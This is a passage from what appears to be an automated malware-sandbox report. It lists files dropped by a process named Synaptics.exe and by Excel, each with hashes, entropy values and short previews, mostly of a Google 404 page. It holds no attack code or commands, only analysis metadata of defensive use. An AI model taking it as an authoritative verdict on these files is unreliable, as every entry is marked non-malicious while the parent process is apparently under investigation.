                                                                                                                                                                                  SSDEEP:24:GgsF+0k9SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n9+pAZewRDK4mW
                                                                                                                                                                                  MD5:72ED33D62F99894B40A5F545AACA605B
                                                                                                                                                                                  SHA1:5469566EDBA8D3CED1B8F29482E55D172D586718
                                                                                                                                                                                  SHA-256:ACBE93245FC42C46C5817C9C34E3337F47020328C9B9A372033768CF05A81C95
                                                                                                                                                                                  SHA-512:5C145551DAE02637D3BF2E6257E50716C5C230496C8967A4539C4FF91541AE878B3C460BCCCAB8DCEAC1CFA21CC8EB9B5C36BB48485FF0BF4D351822DA7034CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GvwCLZtt29vwo7QqrCVw7A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\uCvbSIM.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.258413521194017
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                                                  MD5:5DDA11AF12E032628E2B8094953908D6
                                                                                                                                                                                  SHA1:02C845EB50055C2665ACD7062323F06AC545A586
                                                                                                                                                                                  SHA-256:FEBC3EA81B34098FEA7DD15D63E3AB8973ACB045B78A738EC715562790484C09
                                                                                                                                                                                  SHA-512:B5B3A1004CBF533A5945410B6BFCA46948F8CA73E9140E874548475BF9A635FB1A03CFE6C0B7FEC6A5BB06E8A877A8DA87C74E2201E443F1403881375BBB988B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7RFHNrbGinV5yqPToP-xKg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ue7aqqa.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2512237895080425
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                                                                                                                  MD5:7D63CE17DB441509253F835074D60242
                                                                                                                                                                                  SHA1:7D72D586A3EAE70BDE2F4B78283B3BA11FCEC634
                                                                                                                                                                                  SHA-256:0308A2A2CF5347936CC609E8FAA94AFBE97C9CCE2787CF0371A053D71F2EA32E
                                                                                                                                                                                  SHA-512:74DE0CD82B51DE638B526F5B7A4C3D175E0CBE0DBB85700E19E8674556A23DD48005EEBF1ED5A0BF731CA728184EA998B2A91BC40DC026DF95920CDDF02048B1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fUxCp60jg8mF4rwzUu0tTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\vY2AQPM.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2679816341921155
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0+pAZewRDK4mW
                                                                                                                                                                                  MD5:A1EE36B5D1D31AC9DF4F978C60598DC9
                                                                                                                                                                                  SHA1:C5F053029E565E61AEAC56C491CCF25EACB8B379
                                                                                                                                                                                  SHA-256:3E6B5CFE2ADA7F606631DBA00D611B76B1EEE2CAF7A465935570CC587838D32D
                                                                                                                                                                                  SHA-512:930D4CDFDE9AC420F5187E64D6EBC75C3E13F1399AAF8ED802817AB557774C84DC6AD566AE0F3DD62E515BAC4B104BF407D71F4378633FAF7187868826BC5102
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oAKQJ2BNhz7_oqjBYsnAFg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\vg3B98b.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2525311161384565
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                                                                  MD5:12EF4B061402C2350C547E2B3224C14C
                                                                                                                                                                                  SHA1:064B8B2C847CB63E93223686DEFFB133787DE344
                                                                                                                                                                                  SHA-256:F63E59F504677C3264097F3ED1F8731D8E0FBDEA3FAEF8AFA4097661296327BB
                                                                                                                                                                                  SHA-512:A302DA2C06D175948051D6CF9AF07BBBD433D45234142E0FE421447552F6D0D30B4993BC20ADFB3E8A05D9E0D2504956CBD2DE30DC7C5029FD60B6A2D40C4603
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="x95RS1mved7mSqtKbE5--Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\x5UviuI.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.272801239091918
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0VbjZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+AZ+pAZewRDK4mW
                                                                                                                                                                                  MD5:0D937B45207581195007BFB323CB85AF
                                                                                                                                                                                  SHA1:9ED5C798AAEDE345CD36ACCCCABF410D794894AF
                                                                                                                                                                                  SHA-256:0450A0D4C288332BF1719966BFB8A2E9C3FC66F0F7FB57216F75B974831B02A2
                                                                                                                                                                                  SHA-512:0D948A2861F880991DA34CB783C0AE5A67105BB9AD0E4D4CC7E131D45609FD3B561C482EEDEA6FAB5CEE0CB60BCC3C82543AAF0FAB2BA02F99A5B2B2CE15B3E4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U8tGY_CVWFUxoHbtTrMSCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xx8MmK2.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2472486672181695
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                                                                                  MD5:54604580DBBBA1991950CB9548DC1F9C
                                                                                                                                                                                  SHA1:1C2D5E68E603B87EBAB229BF6604F42B31418F29
                                                                                                                                                                                  SHA-256:C5DC195620DF69949778143AE4F749BA74BFEFAD8E64B87D84D15B8D8DC5195E
                                                                                                                                                                                  SHA-512:DE5CC10664B71486E4CA55CAF5A4B796EBFC13A75D0CCC0EA0F846EB88DE1C9EFD05099D6CB7288F3A9384F79735E9108A1B4E5D47F19230F800D679F4D41536
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QMWy-zM8ny35flxUwoe-og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ydxf9ay.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.266577071046379
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0pFISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+YFI+pAZewRDK4mW
                                                                                                                                                                                  MD5:25822EBF56C970764E84A84A902BAC54
                                                                                                                                                                                  SHA1:71C4F20F7673D0278E42E002D317CB14291C2EF7
                                                                                                                                                                                  SHA-256:DD284427B74C3085D0DF6AF6258A14EA35CA07B89BD8BAF425FB81EE3C8168CF
                                                                                                                                                                                  SHA-512:3DC5E9A16F6757B92CE1F255807BE529AFBA47183D79E82CEC38AEFA92B926EAC7D40704CF77E510FCE2A1D97FB6392B96E23181CC1CA48747283DCBC5EDC9C2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZX8kh243Ko5I70pJz6HUfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yvFq6oH.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.262025842478393
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0cBaSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NBa+pAZewRDK4mW
                                                                                                                                                                                  MD5:B13E44B0E6FEE15C3BF18B460AAAAD17
                                                                                                                                                                                  SHA1:4E25BD76807AB3ECAA4F5081D4A8FCC853840992
                                                                                                                                                                                  SHA-256:126646CB8537212AFBCB4FD77F2011980B5C7293513712279902EAFF08613511
                                                                                                                                                                                  SHA-512:6A3DE6D989891CB998493C786F31CEE671115DFB64DE2C4A4BD395747C0B5FE1C6BED85C2B9E7C91D8E3FE1EA59AB1D7C8B0FE3A45222AD09C105F64513EA814
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BsBm09185aXQPZu8RdkxhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yyIGZjp.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.266647320966449
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                                                                                  MD5:0A71FD5DF09A3F0493553874B49D9768
                                                                                                                                                                                  SHA1:4F2884851B453E67148CE45DFC04FA37F770C93F
                                                                                                                                                                                  SHA-256:0D5DE3442C8CE9EF58E9FC249879B773907F43CDFC7720085DAD2008DB0D9788
                                                                                                                                                                                  SHA-512:6E3F46F28F32EEF11DE736C0280739D7B46C6BD3CE6A452C2557ACD83ADB83C86D99722A89B3EC3840F5C347C5843BB51BE274F4668BB8FDC422122CBA184A54
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yx7d2FK2k5Hc9SLCSyN_vQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yyvIFjz.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.253284022412341
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                                                                  MD5:534068634F1FA8C58720E7BBCC62D2DC
                                                                                                                                                                                  SHA1:8BA165D2D6FC9779E3C364AE42C5ABE463DE9C31
                                                                                                                                                                                  SHA-256:3D2DAC95F88AC6159B178B574910D4DD5631AF3EB2D5DA073107E29FF3BA72C3
                                                                                                                                                                                  SHA-512:19E173B23FE3E27E941067C66FB480A24F48242C3FEF58313AE0F3AAB96FD3A27F584E0370CE0C8D3AC8C84E94F266C15B161FD54A276948D181F4B6FE60F6B1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tAwNz26rnQRAhsi5oGjdwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\zyypRUL.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.262374323157272
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0+ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ZZ+pAZewRDK4mW
                                                                                                                                                                                  MD5:5FEA35C51B879FE60DFCE8BCBAD08441
                                                                                                                                                                                  SHA1:96AC0E6812D57CF08F1F9BDFE172EB488A4AB7A5
                                                                                                                                                                                  SHA-256:4B6E12A7FE6D2CC4F284BF3DE4A9895356C69131BD95714A073D3BC5888BC314
                                                                                                                                                                                  SHA-512:CA9A9EC750FF24E9978043FF93077B6452F216EE33544B262A52606C68A8FF8147DF5F8B0E1B3013B04EE83230AE3A7A3E3350A5C377F0CAF1DA6CF180160534
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sqn6WbhcYDlAoETBqLtVcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~$2iL45kbL.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                                  MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                                  SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                                  SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                                  SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~$JLGkYinr.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                                  MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                                  SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                                  SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                                  SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF37B6DF48CC54854D.TMP

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):3.746897789531007
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                                  MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                                  SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                                  SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                                  SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF744B3B70623EEB7E.TMP

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):3.746897789531007
                                                                                                                                                                                  Encrypted:false
